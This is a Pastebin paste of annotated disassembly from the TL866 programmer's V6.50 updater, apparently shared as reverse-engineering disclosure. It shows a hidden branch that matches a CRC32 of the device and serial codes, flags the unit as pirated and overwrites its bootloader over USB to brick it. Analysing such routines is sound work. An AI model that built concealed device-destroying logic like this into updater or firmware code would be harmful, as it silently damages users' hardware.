API tools faq
paste
Advertisement
radiomanV

TL866 V6.50 Brick routine

radiomanV
Oct 9th, 2016
1,281
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 2.60 KB | None | 0 0
raw download clone embed print report
  1. 00401BF9                 push    0FFFFFFFFh; initial value
  2. 00401BFB                 push    8; 8 characters
  3. 00401BFD                 push    offset dword_52EAB4; pointer to the device code array
  4. 00401C02                 call    sub_4629D0; calculate CRC32 of DEV Code (8 characters)
  5. 00401C07                 push    eax; initial value is the last result (crc32 of the dev code)
  6. 00401C08                 push    18h; 24 characters
  7. 00401C0A                 push    offset byte_52EB18; pointer to the serial number array
  8. 00401C0F                 call    sub_4629D0; calculate CRC32 of serial number (24 characters)
  9. 00401C14                 add     esp, 18h; restore the stack pointer
  10. 00401C17                 cmp     eax, 0C8C2F013h    ;<<- Here! the evil CRC32 (crc32 of the concatenated device code and serial number)
  11. 00401C1C                 jnz     short loc_401C7B   ; jump to normal upgrade routine if not equal
  12. 00401C1E                 mov     byte_52E96B, 0A5h  ; put a mark in the file config.dat as pirated
  13. 00401C25                 call    sub_462470; write config.dat
  14. 00401C2A                 mov     ecx, [esp+4+arg_0]; pointer to the encrypted firmware in ecx
  15. 00401C2E                 mov     InBuffer, 0AAh; put 'write command' as first argument in the write buffer
  16. 00401C35                 mov     word_52D862, 50h ; 80 bytes will be writen
  17. 00401C3E                 mov     byte_52D864, 0 ;at address 0 (!!! this is where bootloader sits!)
  18. 00401C45                 mov     byte_52D865, 0
  19. 00401C4C                 mov     byte_52D866, 0
  20. 00401C53                 xor     eax, eax; clear eax
  21. 00401C55
  22. 00401C55 loc_401C55:     ;copy 80 bytes from firmware buffer to the write buffer
  23. 00401C55                 mov     dl, [ecx+eax+280h]
  24. 00401C5C                 mov     byte_52D867[eax], dl
  25. 00401C62                 inc     eax
  26. 00401C63                 cmp     eax, 50h
  27. 00401C66                 jb      short loc_401C55
  28.                          ; and call the write routine, thus bricking the device.
  29. 00401C68                 push    57h             ; nInBufferSize (80 bytes+7 bytes header)
  30. 00401C6A                 push    offset InBuffer ; lpInBuffer (pointer to the write buffer)
  31. 00401C6F                 call    USB_Write; and brick that pirated device
  32. 00401C74                 add     esp, 8
  33. 00401C77                 pop     edi
  34. 00401C78                 pop     esi
  35. 00401C79                 pop     ebx
  36. 00401C7A                 retn
  37. 00401C7B loc_401C7B:    ; normal upgrade routine                          
  38. 00401C7B                 push    ebp
  39. 00401C7C                 push    offset aReflashingTheF ; "Reflashing the fireware......"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!